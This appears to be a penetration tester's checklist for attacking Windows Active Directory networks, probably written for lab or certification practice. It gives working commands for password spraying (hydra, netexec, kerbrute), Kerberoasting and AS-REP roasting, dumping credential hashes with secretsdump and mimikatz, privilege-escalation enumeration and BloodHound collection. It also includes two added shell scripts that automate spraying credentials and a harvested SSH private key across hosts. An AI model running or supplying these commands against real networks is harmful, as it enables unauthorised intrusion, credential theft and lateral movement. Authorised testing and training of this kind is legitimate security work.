Penetration Test Checklist

Unauthenticated Recon - Domain


Initial Compromise of Network

Windows Privilege Escalation


Harvested a New Credential

Make sure to test twice: once with domain auth and once with "--local-auth", so that local (non-domain) account passwords are covered as well.

Spray Passwords

  • $ hydra -l "yoshi" -p 'Mushroom!' -M ips.txt rdp
  • $ netexec smb ips.txt -u users.txt -p passwords.txt 
  • $ netexec winrm ips.txt -u users.txt -p passwords.txt
  • $ netexec wmi ips.txt -u users.txt -p passwords.txt 
  • $ netexec mssql ips.txt -u users.txt -p passwords.txt --local-auth

Manual spray (if the above didn't recover anything).

  • $ proxychains evil-winrm -i 10.10.93.154 -u Administrator -p "Passwords"
  • $ proxychains xfreerdp /v:10.10.93.154 /u:Administrator /p:password
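An added example (not part of the original checklist) that wraps the spray above and pulls out what succeeded. It runs each listed protocol twice, with domain auth and with --local-auth, as the note above says, and then parses netexec's output: a `[+]` tag means the logon worked, and a trailing `(Pwn3d!)` means the account is a local admin on that host. The file names are the checklist's; the sample output and the `corp.local` hosts and credentials in it are constructed for the example, and `--continue-on-success` is added so the run does not stop at the first hit.

```shell
#!/usr/bin/env bash
# Added example: drive the checklist's spray and pick out what succeeded.
# ips.txt / users.txt / passwords.txt are the checklist's own inputs.

# Spray every protocol the checklist lists, once with domain auth and once with
# --local-auth, continuing past the first success so every host is covered.
spray_protocols() {
    ips="$1"; users="$2"; passwords="$3"
    for proto in smb winrm wmi mssql; do
        netexec "$proto" "$ips" -u "$users" -p "$passwords" --continue-on-success
        netexec "$proto" "$ips" -u "$users" -p "$passwords" --continue-on-success --local-auth
    done
}

# Constructed netexec output (not captured from a real engagement), in the column
# layout nxc prints: protocol, ip, port, hostname, status tag, message.
SAMPLE_NXC_OUTPUT='SMB         10.10.10.5      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.5      445    DC01             [+] corp.local\yoshi:Mushroom!
SMB         10.10.10.6      445    WS01             [+] corp.local\yoshi:Mushroom! (Pwn3d!)
SMB         10.10.10.7      445    WS02             [-] corp.local\yoshi:Mushroom! STATUS_LOGON_FAILURE
SMB         10.10.10.8      445    WS03             [+] WS03\backup:Winter2024 (Pwn3d!)
WINRM       10.10.10.6      5985   WS01             [+] corp.local\yoshi:Mushroom! (Pwn3d!)'

# Lines tagged [+] are valid logons: print "proto ip user:pass" for each.
# (Passwords containing whitespace would need a smarter split than awk fields.)
nxc_valid_logins() {
    awk '$5 == "[+]" { print $1, $2, $6 }'
}

# "(Pwn3d!)" means local admin on that host: print "ip user:pass", deduplicated.
nxc_admin_access() {
    awk '$5 == "[+]" && /\(Pwn3d!\)/ { print $2, $6 }' | sort -u
}

# Unique credential pairs that worked anywhere, to feed the next checklist step.
nxc_new_creds() {
    awk '$5 == "[+]" { print $6 }' | sort -u
}

# Stand-alone run on the constructed sample; for a live spray, pipe
# spray_protocols ips.txt users.txt passwords.txt into the same functions.
printf '%s\n' "$SAMPLE_NXC_OUTPUT" | nxc_admin_access
```

The admin list is where to go next (secretsdump, mimikatz); the full `[+]` list still matters because a valid non-admin domain logon is enough for Kerberoasting and BloodHound collection.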

Harvested Domain Credential

Kerbrute

  • $ proxychains kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1

Kerberoast

  • $ proxychains impacket-GetUserSPNs -request -dc-ip 10.10.113.146 corp.com/web_svc

ASREP Roast

  • $ proxychains impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete

Harvest new Hash


Harvested a new Private Key

Spray Intranet (.ssh)

If we have a shell on a box and notice that a user has a private key in their home directory, we should test it against every host with SSH open.
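An added example (not part of the original checklist) of doing that spray: find the hosts with port 22 open from nmap's grepable output, then try the key against each one non-interactively. The nmap output below is constructed, and the key path `./id_rsa_harvested` and the user `yoshi` are assumptions; `SSH_CMD` exists only so the loop can be exercised with a stub instead of a live ssh.

```shell
#!/usr/bin/env bash
# Added example: spray a harvested SSH private key across every host with SSH open.
# Assumed: the key was copied off the box to ./id_rsa_harvested and belongs to "yoshi".

# Constructed nmap grepable output, as produced by: nmap -p22 --open -oG - 10.10.10.0/28
SAMPLE_NMAP_GREPABLE='# Nmap 7.94 scan initiated
Host: 10.10.10.5 ()	Status: Up
Host: 10.10.10.5 ()	Ports: 22/open/tcp//ssh///
Host: 10.10.10.6 ()	Ports: 22/open/tcp//ssh///
Host: 10.10.10.7 ()	Ports: 22/closed/tcp//ssh///
Host: 10.10.10.9 ()	Ports: 22/open/tcp//ssh///
# Nmap done'

# Keep only the hosts whose port 22 is open (field 2 of a "Ports:" line is the IP).
ssh_hosts_from_nmap() {
    awk '/Ports:/ && /22\/open\/tcp/ { print $2 }'
}

# Read hosts on stdin, try the key against each, print the ones that accept it.
# BatchMode stops ssh from falling back to a password prompt when the key is
# refused; ConnectTimeout keeps dead hosts from stalling the loop.
spray_ssh_key() {
    key="$1"; user="$2"
    ssh_cmd="${SSH_CMD:-ssh}"
    while read -r host; do
        [ -n "$host" ] || continue
        if "$ssh_cmd" -i "$key" -o BatchMode=yes -o StrictHostKeyChecking=no \
              -o ConnectTimeout=5 -l "$user" "$host" true 2>/dev/null; then
            echo "$host"
        fi
    done
}

# Live version: scan a range, then spray. Usage: ssh_key_spray_live 10.10.10.0/24 ./id_rsa_harvested yoshi
ssh_key_spray_live() {
    nmap -p22 --open -oG - "$1" | ssh_hosts_from_nmap | spray_ssh_key "$2" "$3"
}

# Stand-alone run: list the candidate hosts from the constructed scan.
printf '%s\n' "$SAMPLE_NMAP_GREPABLE" | ssh_hosts_from_nmap
```

Run the spray with the key's original owner first; if the key is unlabelled, check `ssh-keygen -l -f` and any `.ssh/config` or `known_hosts` entries on the source box for the usernames and hosts it was actually used with before widening the user list.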


Popped a new Shell

Manual Enumeration

Domain Connected User

Check ACLs/ACEs

Pwned shell? Dump secrets!

  • $ proxychains impacket-secretsdump -hashes ":e728ecbadfb02f51ce8eed753f3ff3fd" [email protected]
  • PS> .\mimikatz.exe

Privilege Escalation - Windows

Automated Enumeration

  • PS> .\winPEASx64.exe
  • PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Manual Enumeration

  • systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Network Card(s)" /C:"Hotfix(s)"
  • whoami /priv
  • net user <user>
  • net localgroup administrators
  • cmd.exe /c dir /a C:\
  • ls "program files"
  • netstat -nao
  • .\SharpHound -c All --domain medtech.com --zipfilename MEDTECH.zip

Active Directory Lateral Movement

Crying for help?
